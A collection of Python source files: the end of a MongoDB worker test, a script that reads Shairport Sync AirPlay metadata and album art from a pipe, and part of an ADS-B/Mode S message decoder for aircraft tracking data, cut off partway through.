assert trials.count_by_state_unsynced(JOB_STATE_DONE) == max_evals
class FakeOptions:
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
# -- assert that the test raises a ReserveTimeout within 5 seconds
@nose.tools.timed(10.0) # XXX: this needs a suspiciously long timeout
@nose.tools.raises(ReserveTimeout)
@with_mongo_trials
def test_main_worker(trials):
options = FakeOptions(
max_jobs=1,
# XXX: sync this with TempMongo
mongo=as_mongo_str("localhost:22334/foodb"),
reserve_timeout=1,
poll_interval=0.5,
workdir=None,
exp_key="foo",
last_job_timeout=None,
)
# -- check that it runs
# and that the reserve timeout is respected
main_worker_helper(options, ())
|
shairport_sync_pipe_reader.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# cat /tmp/shairport-sync-metadata | python3 output_text.py
import base64
import binascii
import codecs
import json
import logging
import math
import os
import re
import shutil
import sys
import tempfile
import time
from multiprocessing import Process
try:
from asciimatics.renderers import ImageFile # pip install asciimatics
asciimatics_avail = True
except ImportError:
# print('-W- for asciiart: [sudo] pip[3] install asciimatics', file=sys.stderr)
asciimatics_avail = False
# from shairport_sync_metadata import VERSION as shairport_sync_metadata_version
# configure tempfile dir
name = os.path.basename(__file__)
tempdirname = tempfile.mkdtemp(
prefix='shairport-sync-metadata-', dir=tempfile.tempdir)
# set up logging to file
logging_filename = '{}.log'.format(
os.path.join(tempdirname, os.path.basename(__file__)))
# print('-I- Using log file {}'.format(logging_filename), file=sys.stderr)
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M',
filename=logging_filename,
filemode='w')
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.DEBUG)
# set a format which is simpler for console use
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
logger = logging.getLogger(__name__)
# logger.info('testing')
# started with code from
# https://github.com/surekap/MMM-ShairportMetadata/blob/master/shairport-metadata.py
def start_item(line):
regex = r"<item><type>(([A-Fa-f0-9]{2}){4})</type><code>(([A-Fa-f0-9]{2}){4})</code><length>(\d*)</length>"
matches = re.findall(regex, line)
#print(matches)
# python2 only # typ = matches[0][0].decode('hex')
# python2 only # code = matches[0][2].decode('hex')
#typ = codecs.decode(matches[0][0], 'hex').decode()
#code = codecs.decode(matches[0][2], 'hex').decode()
#typ = base64.b16decode(matches[0][0], casefold=True).decode()
#code = base64.b16decode(matches[0][2], casefold=True).decode()
typ = str(binascii.unhexlify(matches[0][0]), 'ascii')
code = str(binascii.unhexlify(matches[0][2]), 'ascii')
length = int(matches[0][4])
return (typ, code, length)
def start_data(line):
# logger.debug(line)
try:
assert line == '<data encoding="base64">\n'
except AssertionError:
if line.startswith("<data"):
return 0
return -1
return 0
def read_data(line, length):
# convert to base64 size
b64size = 4 * math.ceil((length) / 3)
#if length < 100: print (line, end="")
try:
data = base64.b64decode(line[:b64size])
# Assume it is a PICT and do not attempt to decode the binary data
if length > 1000:
# print (data[:4])
return data
data = data.decode()
except TypeError:
data = ""
pass
except UnicodeDecodeError:
# print(data)
data = ""
pass
return data
def guessImageMime(magic):
# print(magic[:4])
if magic.startswith(b'\xff\xd8'):
return 'image/jpeg'
elif magic.startswith(b'\x89PNG\r\n\x1a\r'):
return 'image/png'
else:
return "image/jpg"
def main():
metadata = {}
fi = sys.stdin
while True:
line = sys.stdin.readline()
if not line: #EOF
break
#print(line, end="")
sys.stdout.flush()
if not line.startswith("<item>"):
continue
typ, code, length = start_item(line)
#print (typ, code, length)
data = ""
if (length > 0):
line2 = fi.readline()
#print('line2:{}'.format(line2), end="")
r = start_data(line2)
if (r == -1):
continue
line3 = fi.readline()
#print('line3:{}'.format(line3), end="")
data = read_data(line3, length)
# Everything read
if (typ == 'core'):
#logger.debug(code)
#logger.debug(data)
if (code == "asal"):
metadata['songalbum'] = data
# print(data)
elif (code == "asar"):
metadata['songartist'] = data
#elif (code == "ascm"):
# metadata['Comment'] = data
#elif (code == "asgn"):
# metadata['Genre'] = data
elif (code == "minm"):
metadata['itemname'] = data
#elif (code == "ascp"):
# metadata['Composer'] = data
#elif (code == "asdt"):
# metadata['File Kind'] = data
#elif (code == "assn"):
# metadata['Sort as'] = data
#elif (code == "clip"):
# metadata['IP'] = data
if (typ == "ssnc" and code == "prgr"):
state_changed('play', None)
if (typ == "ssnc" and code == "pfls"):
metadata = {}
# print(json.dumps({}))
state_changed('pause', None)
sys.stdout.flush()
if (typ == "ssnc" and code == "pend"):
metadata = {}
# print(json.dumps({}))
sys.stdout.flush()
if (typ == "ssnc" and code == "PICT"):
# print(typ, code, length, len(data))
if (len(data) == 0):
# print(json.dumps({"image": ""}))
pass
else:
mime = guessImageMime(data)
# print(mime)
if (mime == 'image/png'):
temp_file = tempfile.NamedTemporaryFile(
prefix="image_",
suffix=".png",
delete=False,
dir=tempdirname)
elif (mime == 'image/jpeg'):
temp_file = tempfile.NamedTemporaryFile(
prefix="image_",
suffix=".jpeg",
delete=False,
dir=tempdirname)
else:
temp_file = tempfile.NamedTemporaryFile(
prefix="image_",
suffix=".jpg",
delete=False,
dir=tempdirname)
with temp_file as file:
file.write(data)
file.close()
notify_album_artwork(temp_file.name)
# logger.info('Wrote file {}'.format(temp_file.name))
if asciimatics_avail:
# logger.debug('loading image for ascii art')
asciimatics_img = ImageFile(temp_file.name, height=22, colours=16)
# print(asciimatics_img)
sys.stdout.flush()
if (typ == "ssnc" and code == "mden"):
# logger.debug('metadata end')
# print(json.dumps(metadata))
state_changed('play', metadata)
sys.stdout.flush()
metadata = {}
# this never gets called in current code <- original dev comment
# actually gets called, workflow: start music on airplay, switch to bluetooth device, whoops
# tempdir is not defined
# if tempdir is not None:
# shutil.rmtree(tempdir)
previous_metadata = []
pause_process = []
def state_changed(state, metadata):
global previous_metadata
if metadata is not None:
previous_metadata = metadata
else:
metadata = previous_metadata
if metadata is not None:
if state == 'play':
for p in pause_process:
if p.is_alive():
p.kill()
pause_process.remove(p)
notify(state, metadata)
elif state == 'pause':
process = Process(target=__state_changed_to_pause, args=(state, metadata, ))
process.start()
pause_process.append(process)
else:
print('metadata was None!')
def __state_changed_to_pause(state, metadata):
time.sleep(3)
notify(state, metadata)
def notify(state, metadata):
track_information = ''
if 'songartist' in metadata:
track_information += metadata['songartist']
if 'itemname' in metadata:
if len(track_information) > 0:
track_information += ' - '
track_information += metadata['itemname']
# shairport_sync_onevent.set_track_information(state, track_information)
os.system('/home/pi/scripts/github/media_frame/scripts/onevent.py ShairportSync')
def notify_album_artwork(path):
# shairport_sync_onevent.set_album_artwork(path)
pass
# cat /tmp/shairport-sync-metadata | /usr/bin/python3 ./output_text.py
# cat /tmp/shairport-sync-metadata | python3 ~/scripts/github/shairport-sync-metadata-python/bin/output_text.py
if __name__ == "__main__":
main()
|
decode.py
|
# mypy: ignore-errors
# This line can be removed when typing in pyModeS is complete and released.
from __future__ import annotations
import heapq
import logging
import os
import socket
import sys
import threading
import time
from datetime import datetime, timedelta, timezone
from operator import itemgetter
from pathlib import Path
from typing import (
Any,
Callable,
Dict,
Iterable,
Iterator,
Optional,
TextIO,
TypeVar,
Union,
cast,
)
import pyModeS as pms
from tqdm.rich import tqdm
import pandas as pd
from ...core import Flight, Traffic
from ...data.basic.airports import Airport
if sys.version_info >= (3, 8):
from typing import TypedDict
else:
from typing_extensions import TypedDict
Decoder = TypeVar("Decoder", bound="ModeS_Decoder")
def next_msg(chunk_it: Iterator[bytes]) -> Iterator[bytes]:
data = b""
for chunk in chunk_it:
data += chunk
while len(data) >= 23:
it = data.find(0x1A)
if it < 0:
break
data = data[it:]
if len(data) < 23:
break
if data[1] == 0x33:
yield data[:23]
data = data[23:]
continue
elif data[1] == 0x32:
data = data[16:]
continue
elif data[1] == 0x31:
data = data[11:]
continue
elif data[1] == 0x34:
data = data[23:]
continue
else:
data = data[1:]
def decode_time_default(
msg: str, time_0: Optional[datetime] = None
) -> datetime:
return datetime.now(timezone.utc)
def decode_time_radarcape(
msg: str, time_0: Optional[datetime] = None
) -> datetime:
now = datetime.now(timezone.utc)
if time_0 is not None:
now = time_0
timestamp = int(msg[4:16], 16)
nanos = timestamp & 0x00003FFFFFFF
secs = timestamp >> 30
now = now.replace(hour=0, minute=0, second=0, microsecond=0)
now += timedelta(seconds=secs, microseconds=nanos / 1000)
return now
def decode_time_dump1090(
msg: str, time_0: Optional[datetime] = None
) -> datetime:
now = datetime.now(timezone.utc)
if time_0 is not None:
now = time_0
else:
now = now.replace(hour=0, minute=0, second=0, microsecond=0)
timestamp = int(msg[4:16], 16)
# dump1090/net_io.c => time (in 12Mhz ticks)
now += timedelta(seconds=timestamp / 12e6)
return now
decode_time: dict[str, Callable[[str, Optional[datetime]], datetime]] = {
"radarcape": decode_time_radarcape,
"dump1090": decode_time_dump1090,
"default": decode_time_default,
}
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the to_be_stopped() condition."""
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
# self.daemon = True # is it redundant?
self._stop_event = threading.Event()
def stop(self) -> None:
self._stop_event.set()
def to_be_stopped(self) -> bool:
return self._stop_event.is_set()
# total=False means that some keys can be absent
class Entry(TypedDict, total=False):
timestamp: datetime
icao24: str
callsign: Optional[str]
latitude: Optional[float]
longitude: Optional[float]
altitude: Optional[int]
geoaltitude: Optional[int]
groundspeed: Optional[int]
track: Optional[float]
vertical_rate: Optional[int]
onground: Optional[bool]
squawk: Optional[int]
# BDS 4,0
selected_fms: Optional[int]
selected_mcp: Optional[int]
barometric_setting: Optional[int]
# BDS 4,4
humidity: Optional[int]
pressure: Optional[int]
temperature: Optional[int]
turbulence: Optional[int]
windspeed: Optional[int]
winddirection: Optional[int]
# BDS 4,5
wind_shear: Optional[int]
microburst: Optional[int]
icing: Optional[int]
wake_vortex: Optional[int]
radio_height: Optional[int]
# BDS 5,0
roll: Optional[float]
TAS: Optional[int]
track_rate: Optional[float]
# BDS 6,0
IAS: Optional[int]
heading: Optional[float]
Mach: Optional[float]
vertical_rate_barometric: Optional[int]
vertical_rate_inertial: Optional[int]
# Uncertainty
HPL: Optional[int]
RCu: Optional[int]
RCv: Optional[int]
HCR: Optional[int]
VPL: Optional[int]
HVE: Optional[int]
VVE: Optional[int]
HFM: Optional[int]
VFM: Optional[int]
EPU: Optional[int]
VEPU: Optional[int]
version: Optional[int]
pHCR: Optional[int]
pVPL: Optional[int]
sil_base: Optional[int]
class Aircraft(object):
def __init__(self, icao24: str, lat0: float, lon0: float) -> None:
self.icao24 = icao24
self._callsign: Optional[str] = None
self._flight: Optional[Flight] = None
self.cumul: list[Entry] = []
self.t0: Optional[datetime] = None
self.t1: Optional[datetime] = None
self.tpos: Optional[datetime] = None
self.m0: Optional[str] = None
self.m1: Optional[str] = None
self.lat: Optional[float] = None
self.lon: Optional[float] = None
self.alt: Optional[int] = None
self.trk: Optional[float] = None
self.spd: Optional[int] = None
self.lat0: float = lat0
self.lon0: float = lon0
self.version: Optional[int] = None
self.nic_a: Optional[int] = None
self.nic_bc: Optional[int] = None
self.nic_s: Optional[int] = None
self.lock = threading.Lock()
@property
def flight(self) -> Optional[Flight]:
with self.lock: # access then clear not thread-safe, hence the lock
df = pd.DataFrame.from_records(self.cumul)
self.cumul.clear()
if self._flight is not None:
if len(df) > 0:
df = pd.concat([self._flight.data, df], sort=False)
else:
df = self._flight.data
if self.version is not None:
# remove columns added by nuc_p, nuc_r
if "HPL" in df.columns:
df = df.drop(columns=["HPL", "RCu", "RCv"])
if "HVE" in df.columns:
df = df.drop(columns=["HVE", "VVE"])
if len(df) == 0:
return None
if 'callsign' in set(df.columns):
self._flight = Flight(
df.assign(
callsign=df.callsign.replace("", None)
.fillna(method="ffill")
.fillna(method="bfill")
)
)
else:
self._flight = Flight(
df.assign(
callsign=None
)
)
return self._flight
@property
def callsign(self) -> Optional[str]:
return self._callsign
@callsign.setter
def callsign(self, args: tuple[datetime, str]) -> None:
t, msg = args
callsign = pms.adsb.callsign(msg).strip("_")
if callsign == "":
return
self._callsign = callsign
with self.lock:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, callsign=self._callsign)
)
@property
def speed(self) -> None:
pass
@speed.setter
def speed(self, args: tuple[datetime, str]) -> None:
t, msg = args
vdata = pms.adsb.velocity(msg)
if vdata is None:
return
spd, trk, roc, tag = vdata
if tag != "GS":
# does it ever happen...
return
if (spd is None) or (trk is None):
return
self.spd = spd
self.trk = trk
delta = pms.adsb.altitude_diff(msg)
with self.lock:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
groundspeed=spd,
track=trk,
vertical_rate=roc,
)
)
if delta is not None and self.alt is not None:
self.cumul[-1]["geoaltitude"] = self.alt + delta
@property
def position(self) -> None:
pass
@position.setter
def position(self, args: tuple[datetime, str]) -> None:
t, msg = args
oe = pms.adsb.oe_flag(msg)
setattr(self, "m" + str(oe), msg)
setattr(self, "t" + str(oe), t)
if (
self.t0 is not None
and self.t1 is not None
and abs((self.t0 - self.t1).total_seconds()) < 10
):
latlon = pms.adsb.position(
self.m0, self.m1, self.t0, self.t1, self.lat0, self.lon0
)
else:
latlon = None
if latlon is not None:
self.tpos = t
self.lat, self.lon = latlon
self.alt = pms.adsb.altitude(msg)
with self.lock:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
latitude=self.lat,
longitude=self.lon,
altitude=self.alt,
onground=False,
)
)
@property
def surface(self) -> None:
pass
@surface.setter
def surface(self, args: tuple[datetime, str]) -> None:
t, msg = args
self.lat, self.lon = pms.adsb.surface_position_with_ref(
msg, self.lat0, self.lon0
)
speed, track, _, speed_type, *_ = pms.adsb.surface_velocity(msg)
if speed_type != "GS":
logging.warn(f"Ground airspeed for aircraft {self.icao24}")
with self.lock:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
latitude=self.lat,
longitude=self.lon,
groundspeed=speed,
track=track,
onground=True,
)
)
@property
def altcode(self) -> None:
pass
@altcode.setter
def altcode(self, args: tuple[datetime, str]) -> None:
t, msg = args
from pyModeS import hex2bin
if set(hex2bin(msg)[19:32]) in [{"0"}, {"1"}]:
return
self.alt = pms.common.altcode(msg)
with self.lock:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, altitude=self.alt)
)
@property
def idcode(self) -> None:
pass
@idcode.setter
def idcode(self, args: tuple[datetime, str]) -> None:
t, msg = args
from pyModeS import hex2bin
if set(hex2bin(msg)[19:32]) in [{"0"}, {"1"}]:
return
idcode = pms.common.idcode(msg)
with self.lock:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
squawk=idcode,
)
)
@property
def bds20(self) -> None:
pass
@bds20.setter
def bds20(self, args: tuple[datetime, str]) -> None:
t, msg = args
callsign = pms.commb.cs20(msg).strip("_")
if callsign == "":
return
self._callsign = callsign
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = dict( # type: ignore
**last_entry, callsign=self._callsign
)
else:
self.cumul.append(
dict(
timestamp=t, icao24=self.icao24, callsign=self._callsign
)
)
@property
def bds40(self) -> None:
pass
@bds40.setter
def bds40(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = { # type: ignore
**last_entry,
**dict(
# FMS selected altitude (ft)
selected_fms=pms.commb.selalt40fms(msg),
# MCP/FCU selected altitude (ft)
selected_mcp=pms.commb.selalt40mcp(msg),
# Barometric pressure (mb)
barometric_setting=pms.commb.p40baro(msg),
),
}
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# FMS selected altitude (ft)
selected_fms=pms.commb.selalt40fms(msg),
# MCP/FCU selected altitude (ft)
selected_mcp=pms.commb.selalt40mcp(msg),
# Barometric pressure (mb)
barometric_setting=pms.commb.p40baro(msg),
)
)
@property
def bds44(self) -> None:
pass
@bds44.setter
def bds44(self, args: tuple[datetime, str]) -> None:
t, msg = args
wind = pms.commb.wind44(msg)
wind = wind if wind is not None else (None, None)
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF 5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = { # type: ignore
**last_entry,
**dict(
# Humidity (%)
humidity=pms.commb.hum44(msg),
# Average static pressure (hPa)
pressure=pms.commb.p44(msg),
# Static air temperature (C)
temperature=pms.commb.temp44(msg),
turbulence=pms.commb.turb44(msg),
# Wind speed (kt) and direction (true) (deg)
windspeed=wind[0],
winddirection=wind[1],
),
}
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# Humidity (%)
humidity=pms.commb.hum44(msg),
# Average static pressure (hPa)
pressure=pms.commb.p44(msg),
# Static air temperature (C)
temperature=pms.commb.temp44(msg),
turbulence=pms.commb.turb44(msg),
# Wind speed (kt) and direction (true) (deg)
windspeed=wind[0],
winddirection=wind[1],
)
)
@property
def bds45(self) -> None:
pass
@bds45.setter
def bds45(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF 5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = { # type: ignore
**last_entry,
**dict(
# Turbulence level (0-3)
turbulence=pms.commb.turb45(msg),
# Wind shear level (0-3)
wind_shear=pms.commb.ws45(msg),
# Microburst level (0-3)
microburst=pms.commb.mb45(msg),
# Icing level (0-3)
icing=pms.commb.ic45(msg),
# Wake vortex level (0-3)
wake_vortex=pms.commb.wv45(msg),
# Static air temperature (C)
temperature=pms.commb.temp45(msg),
# Average static pressure (hPa)
pressure=pms.commb.p45(msg),
# Radio height (ft)
radio_height=pms.commb.rh45(msg),
),
}
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# Turbulence level (0-3)
turbulence=pms.commb.turb45(msg),
# Wind shear level (0-3)
wind_shear=pms.commb.ws45(msg),
# Microburst level (0-3)
microburst=pms.commb.mb45(msg),
# Icing level (0-3)
icing=pms.commb.ic45(msg),
# Wake vortex level (0-3)
wake_vortex=pms.commb.wv45(msg),
# Static air temperature (C)
temperature=pms.commb.temp45(msg),
# Average static pressure (hPa)
pressure=pms.commb.p45(msg),
# Radio height (ft)
radio_height=pms.commb.rh45(msg),
)
)
@property
def bds50(self) -> None:
pass
@bds50.setter
def bds50(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = { # type: ignore
**last_entry,
**dict(
# Ground speed (kt)
groundspeed=pms.commb.gs50(msg),
# Roll angle (deg)
roll=pms.commb.roll50(msg),
# True airspeed (kt)
TAS=pms.commb.tas50(msg),
# True track angle (deg)
track=pms.commb.trk50(msg),
# Track angle rate (deg/sec)
track_rate=pms.commb.rtrk50(msg),
),
}
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# Ground speed (kt)
groundspeed=pms.commb.gs50(msg),
# Roll angle (deg)
roll=pms.commb.roll50(msg),
# True airspeed (kt)
TAS=pms.commb.tas50(msg),
# True track angle (deg)
track=pms.commb.trk50(msg),
# Track angle rate (deg/sec)
track_rate=pms.commb.rtrk50(msg),
)
)
@property
def bds60(self) -> None:
pass
@bds60.setter
def bds60(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = { # type: ignore
**last_entry,
**dict(
# Indicated airspeed (kt)
IAS=pms.commb.ias60(msg),
# Magnetic heading (deg)
heading=pms.commb.hdg60(msg),
# Mach number (-)
Mach=pms.commb.mach60(msg),
# Barometric altitude rate (ft/min)
vertical_rate_barometric=pms.commb.vr60baro(msg),
# Inertial vertical speed (ft/min)
vertical_rate_inertial=pms.commb.vr60ins(msg),
),
}
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# Indicated airspeed (kt)
IAS=pms.commb.ias60(msg),
# Magnetic heading (deg)
heading=pms.commb.hdg60(msg),
# Mach number (-)
Mach=pms.commb.mach60(msg),
# Barometric altitude rate (ft/min)
vertical_rate_barometric=pms.commb.vr60baro(msg),
# Inertial vertical speed (ft/min)
vertical_rate_inertial=pms.commb.vr60ins(msg),
)
)
@property
def nuc_p(self) -> None:
pass
@nuc_p.setter
def nuc_p(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
hpl, rcu, rcv = pms.adsb.nuc_p(msg)
current = dict(
# Horizontal Protection Limit
HPL=hpl,
# 95% Containment Radius on horizontal position error
RCu=rcu,
# 95% Containment Radius on vertical position error
RCv=rcv,
)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current} # type: ignore
else:
self.cumul.append(
dict( # type: ignore
timestamp=t, icao24=self.icao24, **current
)
)
@property
def nic_v1(self) -> None:
pass
@nic_v1.setter
def nic_v1(self, args: tuple[datetime, str]) -> None:
t, msg = args
if self.nic_s is None:
return
with self.lock:
hcr, vpl = pms.adsb.nic_v1(msg, self.nic_s)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Horizontal Containment Radius
HCR=hcr,
# Vertical Protection Limit
VPL=vpl,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current} # type: ignore
else:
self.cumul.append(
dict( # type: ignore
timestamp=t, icao24=self.icao24, **current
)
)
@property
def nic_v2(self) -> None:
pass
@nic_v2.setter
def nic_v2(self, args: tuple[datetime, str]) -> None:
t, msg = args
if self.nic_a is None or self.nic_bc is None:
return
with self.lock:
hcr = pms.adsb.nic_v2(msg, self.nic_a, self.nic_bc)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Horizontal Containment Radius
HCR=hcr
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current} # type: ignore
else:
self.cumul.append(
dict( # type: ignore
timestamp=t, icao24=self.icao24, **current
)
)
@property
def nuc_r(self) -> None:
pass
@nuc_r.setter
def nuc_r(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
hve, vve = pms.adsb.nuc_v(msg)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Horizontal Velocity Error
HVE=hve,
# Vertical Velocity Error
VVE=vve,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current} # type: ignore
else:
self.cumul.append(
dict( # type: ignore
timestamp=t, icao24=self.icao24, **current
)
)
@property
def nac_v(self) -> None:
pass
@nac_v.setter
def nac_v(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
hfm, vfm = pms.adsb.nac_v(msg)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Horizontal Figure of Merit for rate (GNSS)
HFM=hfm,
# Vertical Figure of Merit for rate (GNSS)
VFM=vfm,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current} # type: ignore
else:
self.cumul.append(
dict( # type: ignore
timestamp=t, icao24=self.icao24, **current
)
)
@property
def nac_p(self) -> None:
pass
@nac_p.setter
def nac_p(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
epu, vepu = pms.adsb.nac_p(msg)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Estimated Position Uncertainty
EPU=epu,
# Vertical Estimated Position Uncertainty
VEPU=vepu,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current} # type: ignore
else:
self.cumul.append(
dict( # type: ignore
timestamp=t, icao24=self.icao24, **current
)
)
@property
def sil(self) -> None:
pass
@sil.setter
def sil(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
phcr, pvpl, base = pms.adsb.sil(msg, self.version)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
version=self.version,
# Probability exceeding Horizontal Containment Radius
pHCR=phcr,
# Probability exceeding Vertical Protection Limit
pVPL=pvpl,
sil_base=base,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current} # type: ignore
else:
self.cumul.append(
dict( # type: ignore
timestamp=t, icao24=self.icao24, **current
)
)
class AircraftDict(Dict[str, Aircraft]):
lat0: float
lon0: float
decoder: ModeS_Decoder
def __missing__(self, key: str) -> Aircraft:
self.decoder.on_new_aircraft(key)
self[key] = value = Aircraft(key, self.lat0, self.lon0)
return value
def set_latlon(self, lat0: float, lon0: float) -> None:
self.lat0 = lat0
self.lon0 = lon0
for ac in self.values():
ac.lat0 = lat0
ac.lon0 = lon0
class DumpFormat:
def __init__(self, template: str, sep: str = ",") -> None:
self.template = template
self.sep = sep
self.cols = list(x.strip() for x in template.split(sep))
time_gen = (i for i, elt in enumerate(self.cols) if elt == "time")
self.time_index = next(time_gen, None)
if self.time_index is None:
msg = "Format invalid: must contain 'time'"
raise ValueError(msg)
long_gen = (i for i, elt in enumerate(self.cols) if elt == "longmsg")
self.msg_index = next(long_gen, None)
self.splitmsg = slice(18, None)
if self.msg_index is not None:
return
short_gen = (i for i, elt in enumerate(self.cols) if elt == "shortmsg")
self.msg_index = next(short_gen, None)
if self.msg_index is None:
msg = "Format invalid: must contain either 'longmsg' or 'shortmsg'"
raise ValueError(msg)
self.splitmsg = slice(None)
def get_timestamp(self, line: str) -> datetime:
elts = line.split(self.sep)
return datetime.fromtimestamp(
float(elts[self.time_index].strip()), timezone.utc # type: ignore
)
def get_msg(self, line: str) -> str:
elts = line.split(self.sep)
return elts[self.msg_index][self.splitmsg].strip() # type: ignore
class ModeS_Decoder:
"""
This class implements the full data decoding process with the `pyModeS
library <https://mode-s.org/api/>`_
Data is first available as a list of messages per aircraft, but can be
exported as a :class:`~traffic.core.Traffic` object.
.. warning::
The :meth:`from_address`, :meth:`from_dump1090`, and :meth:`from_rtlsdr`
classmethods start a decoding thread on the creation of the object. The
thread can be stopped with a ``decoder.thread.stop()`` call.
:param reference: A reference location must be provided to decode ground
messages. A reference can be set as:
- a tuple of latitude/longitude coordinates
- a str calling for an :class:`~traffic.core.structure.Airport`
structure
If no reference is provided (None), then reference location (latitude=0,
longitude=0) is considered until more data can be used to readjust the
reference.
"""
decode_thread: Optional[StoppableThread]
timer_thread: Optional[StoppableThread]
timer_functions: list[
tuple[pd.Timestamp, pd.Timedelta, Callable[[Decoder], None]]
] = list()
def __init__(
self,
reference: None | str | Airport | tuple[float, float] = None,
expire_threshold: str | pd.Timedelta = pd.Timedelta("10 minutes"),
expire_frequency: str | pd.Timedelta = pd.Timedelta("1 minute"),
) -> None:
""" """
if isinstance(reference, str):
from ...data import airports
reference = airports[reference]
if reference is None:
logging.warning(
"No valid reference position provided. Fallback to (0, 0)"
)
lat0, lon0 = 0.0, 0.0
elif isinstance(reference, Airport):
lat0, lon0 = reference.latlon
else:
lat0, lon0 = reference
self.acs: AircraftDict = AircraftDict()
self.acs.decoder = self
self.acs.set_latlon(lat0, lon0)
self.decode_thread = None
self.timer_thread = None
self.expire_threshold = (
expire_threshold
if isinstance(expire_threshold, pd.Timedelta)
else pd.Timedelta(expire_threshold)
)
self.expire_frequency = (
expire_frequency
if isinstance(expire_frequency, pd.Timedelta)
else pd.Timedelta(expire_frequency)
)
@classmethod
def on_timer(
cls, frequency: pd.Timedelta | str
) -> Callable[[Callable[[Decoder], None]], Callable[[Decoder], None]]:
now = pd.Timestamp("now", tz="utc")
if isinstance(frequency, str):
frequency = pd.Timedelta(frequency)
def decorate(
function: Callable[[Decoder], None]
) -> Callable[[Decoder], None]:
logging.info(f"Schedule {function.__name__} with {frequency}")
heapq.heappush(
cls.timer_functions,
(now + frequency, frequency, function),
)
return function
return decorate
def expire_aircraft(self) -> None:
logging.info("Running expire_aircraft")
now = pd.Timestamp("now", tz="utc")
if self.decode_thread and not self.decode_thread.is_alive():
for icao in list(self.acs):
self.on_expire_aircraft(icao)
# for icao, ac in self.acs.items()
# not compatible with changes in size of the dictionary
for icao in list(self.acs):
ac = self.acs[icao]
if len(ac.cumul) > 0:
if now - ac.cumul[-1]["timestamp"] >= self.expire_threshold:
self.on_expire_aircraft(icao)
else:
flight = ac.flight
if flight is not None:
if now - flight.stop >= self.expire_threshold:
self.on_expire_aircraft(icao)
def on_expire_aircraft(self, icao: str) -> None:
with self.acs[icao].lock:
del self.acs[icao]
def on_new_aircraft(self, icao: str) -> None:
logging.info(f"New aircraft {icao}")
@classmethod
def from_file(
cls,
filename: str | Path,
reference: str | Airport | tuple[float, float],
uncertainty: bool = False,
template: str = "time, longmsg",
sep: str = ",",
) -> "ModeS_Decoder":
"""Decode raw messages dumped in a text file.
The file should contain for each line at least a timestamp and an
hexadecimal message, as a CSV-like format.
:param filename: the path to the file containing the data
:param reference: the reference location, as specified above
:param uncertainty: if True, decode also `uncertainty information
